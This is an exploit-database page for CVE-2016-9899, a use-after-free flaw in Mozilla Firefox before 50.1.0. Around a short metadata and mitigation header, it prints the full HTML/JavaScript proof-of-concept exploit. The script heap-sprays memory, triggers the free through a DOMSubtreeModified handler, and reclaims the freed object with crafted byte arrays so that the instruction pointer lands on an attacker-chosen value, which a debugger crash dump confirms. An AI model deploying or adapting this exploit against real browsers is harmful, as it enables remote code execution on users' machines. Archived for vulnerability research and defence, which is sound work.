header-logo
Suggest Exploit
vendor:
Firefox
by:
Marcin Ressel
9.8
CVSS
CRITICAL
Use-After-Free
416
CWE
Product Name: Firefox
Affected Version From: Version < 50.1.0
Affected Version To:
Patch Exists: NO
Related CWE: CVE-2016-9899
CPE: a:mozilla:firefox
Metasploit: https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/suse-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/mfsa2016-94-cve-2016-9899/https://www.rapid7.com/db/vulnerabilities/mfsa2016-95-cve-2016-9899/
Other Scripts:
Platforms Tested: Windows 7 (x64) Firefox 32 && 64 bit
2017

Mozilla Firefox Use-After-Free Vulnerability

Mozilla Firefox < 50.1.0 Use-After-Free POC. The vulnerability allows an attacker to execute arbitrary code or cause a denial of service (DoS) by leveraging a Use-After-Free vulnerability in Mozilla Firefox.

Mitigation:

Apply the latest security updates and patches provided by Mozilla Firefox. Avoid visiting untrusted websites or clicking on suspicious links.
Source

Exploit-DB raw data:

<!DOCTYPE html>
<html>
  <head>
  <!-- <meta http-equiv="refresh" content="1"/> -->
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:lime;
        font-color:red;
   };
  </style>
  <script type='text/javascript'></script> 
  <script type="text/javascript" language="JavaScript">
   
   /* 
    * Mozilla Firefox < 50.1.0 Use-After-Free POC
    * Author: Marcin Ressel
    * Date: 13.01.2017
    * Vendor Homepage: www.mozilla.org
    * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
    * Version: < 50.1.0
    * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
    * CVE: CVE-2016-9899
    *************************************************
    * (b1c.5e0): Access violation - code c0000005 (first chance)
    * First chance exceptions are reported before any exception handling.
    * This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - 
    * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
    * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0         nv up ei pl nz na pe nc
    * cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
    * 6d7cc44c ff12            call    dword ptr [edx]      ds:002b:4543484f=????????
    * 0:000> dd eax
    * 0f804c00  4543484f 91919191 91919191 91919191
    * 0f804c10  91919191 91919191 91919191 91919191
    * 0f804c20  91919191 91919191 91919191 91919191
    * 0f804c30  91919191 91919191 91919191 91919191
    * 0f804c40  91919191 91919191 91919191 91919191
    * 0f804c50  91919191 91919191 91919191 91919191
    * 0f804c60  91919191 91919191 91919191 91919191
    * 0f804c70  91919191 91919191 91919191 91919191
    *
    */ 
   var doc = null;
   var cnt = 0;

   function m(blocks,size) {
            var arr = [];
            for(var i=0;i<blocks;i++) {
                arr[i] = new Array(size);
                for(var j=0;j<size;j+=2) {
                    arr[i][j] = 0x41414141;
                    arr[i][j+1] = 0x42424242;
                }
            }
            return arr;
    } 
      
    function handler() {    //free
             if(cnt > 0) return;
             doc.body.appendChild(document.createElement("audio")).remove();      
             m(1024,1024);   
             ++cnt;
    }

    function trigger() {
             if(cnt  > 0) {
                var pl = new Array();
                doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); 
                for(var i=0;i<4096;i++) {           //replace
                    pl[i]=new Uint8Array(1000);
                    pl[i][0] = 0x4F;
                    pl[i][1] = 0x48;
                    pl[i][2] = 0x43;
                    pl[i][3] = 0x45; //eip  
                    for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; 
                   // pl[i] = document.createElement('media');
                    //document.body.appendChild(pl[i]);
                }
                window.pl = pl
                document.getElementById("t1").remove(); //re-use
             }
    }

    function testcase()
    {
             var df = m(4096,1000);
             document.body.setAttribute('df',df);
	     doc = document.getElementById("t1").contentWindow.document;
	     doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); 
	     doc.getElementsByTagName("*")[0].style = "ANNNY";
	     setInterval("trigger();",1000);   

    }
  </script>
  <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR